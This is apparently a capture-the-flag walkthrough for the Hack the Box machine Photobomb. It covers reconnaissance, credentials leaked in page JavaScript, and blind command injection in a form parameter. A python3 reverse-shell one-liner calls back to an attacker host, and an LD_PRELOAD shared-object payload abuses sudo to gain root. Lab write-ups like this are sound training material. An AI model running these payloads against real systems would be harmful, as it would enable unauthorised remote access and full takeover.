Hack the Box (HTB) – Photobomb

Level: Easy

User Flag

Nmap scan

IP=10.10.11.182
nmap -T5 -v -Pn -n -sT -sC -sV -p 1-65535 --max-parallelism 10 $IP -oA nmap-tcp-allports-${IP}-$(date '+%Y.%m.%d.%Hh%M')
Nmap scan report for 10.10.11.182
Host is up (0.044s latency).
Not shown: 65058 closed tcp ports (conn-refused), 475 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We find that ports 22 (SSH) and 80 (HTTP) are open.

Explore the web application on port 80

  • Start Burp Suite and intercept requests.
  • Use a web browser and navigate to http://10.10.11.182
  • The URL is rewritten to http://photobomb.htb.

Add photobomb.htb to /etc/hosts

sudo nano /etc/hosts
10.10.11.182    photobomb.htb

Authentication

Credentials are requested when clicking on “click here” from the home page (http://photobomb.htb/printer).

Display the source of the home page (right-click -> View Page Source).

<!DOCTYPE html>
<html>
<head>
  <title>Photobomb</title>
  <link type="text/css" rel="stylesheet" href="styles.css" media="all" />
  <script src="photobomb.js"></script>
</head>
...

View the photobomb.js script (http://photobomb.htb/photobomb.js)

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me

We find credentials pH0t0:b0Mb!

Access the printer page

Go to http://pH0t0:b0Mb!@photobomb.htb/printer. There is a form to download files.

Original form request (working as expected)

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: ...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic cEgwdDA6YjBNYiE=
Content-Length: 94



photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=1000x1500&submit=submit

Blind command injection

There is a blind command injection in the filetype parameter.

filetype=jpg;whoami

“;whoami” is added to filename but we cannot get the result.

Start a listener

nc -nlvkp 4444

Get a reverse shell

Use python3 (NOT python) or it will not work.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<KALI IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

URL encode all characters from the reverse shell payload and add it to the filetype parameter.

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;%70%79%74%68...&dimensions=1000x1500&submit=submit

We get a reverse shell as user wizard.

cd ..
cat user.txt

f08d1e909f14f7b0729d5cf8f548f3c7

Root Flag

Running Linpeas as the user “wizard” did not help.

Check sudo rights

sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

/opt/cleanup.sh

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Use sudo with LD_PRELOAD

See Linux Sudo LD_PRELOAD Privilege Escalation. On Kali, create file shell.c and compile it.

shell.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
        unsetenv("LD_PRELOAD");
        setgid(0);
        setuid(0);
        system("/bin/sh");
}

Compile shell.c

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Share the file

python3 -m http.server 80

Download the file on photobomb

cd /tmp
wget http://<KALI IP>/shell.so

Exploit

sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh

We get a shell as the root user.

cd /root
cat root.txt

84403530e18d22d7b357409eafa40c38